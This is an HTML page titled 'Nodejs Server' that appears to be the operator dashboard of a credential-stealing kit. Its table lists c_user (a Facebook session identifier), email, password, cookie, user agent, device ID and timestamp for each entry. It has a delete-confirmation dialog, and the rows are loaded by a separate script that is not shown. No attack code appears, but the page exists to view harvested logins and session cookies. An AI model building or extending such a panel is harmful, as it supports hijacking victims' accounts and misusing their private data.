<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Nodejs Server</title>

	<!-- Bootstrap css 5.3 link -->
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
</head>

<body>
	<style>
		html,
		body,
		.intro {
			height: 100%;
			margin: 0;
			/* Remove default margin */
		}

		table {
			width: 100%;
		}

		table td,
		table th {
			text-overflow: ellipsis;
			white-space: nowrap;
			overflow: hidden;
			background: transparent !important;
			color: white !important;
		}

		.short-view {
			width: 100px !important;
		}

		.mask-custom {
			background: rgba(24, 24, 16, .2);
			border-radius: 2em;
			backdrop-filter: blur(25px);
			border: 2px solid rgba(255, 255, 255, 0.05);
			background-clip: padding-box;
			box-shadow: 10px 10px 10px rgba(46, 54, 68, 0.03);
		}

		.mw-25 {
			max-width: 250px !important;
			overflow: scroll;
		}

		input {
			background: transparent !important;
			color: white;
			border: none;
		}

		input:focus {
			outline: none;
		}

		.table-wrapper {
			max-height: 800px;
			overflow-y: auto;
		}

		::-webkit-scrollbar,
		::-webkit-scrollbar-thumb,
		::-webkit-scrollbar-track {
			width: 0;
			height: 0;
		}

		td[data-bs-coppy]:hover {
			color: #ddd !important;
			cursor: pointer !important;
		}
	</style>
	<section class="intro" style=" width: 100vw; height: 100vh;">
		<div class="bg-image h-100" style="background-image: url(https://mdbootstrap.com/img/Photos/new-templates/glassmorphism-article/img7.jpg);">
			<div class="mask d-flex align-items-center h-100">
				<div class="container-fluid">
					<div class="row justify-content-center">
						<div class="col-12">
							<div class="card mask-custom">
								<div class="card-body">
									<div class="table-responsive table-wrapper">
										<table class="table table-borderless text-white mb-0">
											<thead>
												<tr>
													<th scope="col">#</th>
													<th scope="col">c_user</th>
													<th scope="col">email</th>
													<th scope="col">password</th>
													<th scope="col" class="short-view">cookie</th>
													<th scope="col" class="short-view">userAgent</th>
													<th scope="col">device_id</th>
													<th scope="col">timestamps</th>
													<!-- <th scope="col">Action</th> -->
												</tr>
											</thead>
											<tbody>

												<!-- load user data -->

											</tbody>
										</table>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</section>

	<!-- Modal confirm delete-->

	<div class="modal fade" id="staticBackdrop" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true">
		<div class="modal-dialog">
			<div class="modal-content">
				<div class="modal-header">
					<h1 class="modal-title fs-5" id="staticBackdropLabel">Warning!</h1>
					<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
				</div>
				<div class="modal-body">
					<div class="alert alert-warning">Are you sure to delete this user information?</div>
				</div>
				<div class="modal-footer">
					<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
					<a type="button" class="btn btn-danger">Yes</a>
				</div>
			</div>
		</div>
	</div>
	<script src="./script.js"></script>
	<!-- Bootstrap js 5.3 link -->
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
	<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.8/dist/umd/popper.min.js" integrity="sha384-I7E8VVD/ismYTF4hNIPjVp/Zjvgyol6VFvRkX/vR+Vc4jQkC+hVqc2pM8ODewa9r" crossorigin="anonymous"></script>
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.min.js" integrity="sha384-BBtl+eGJRgqQAUMxJ7pMwbEyER4l1g+O15P+16Ep7Q9Q+zqX6gSbd85u4mG4QzX+" crossorigin="anonymous"></script>
</body>

</html>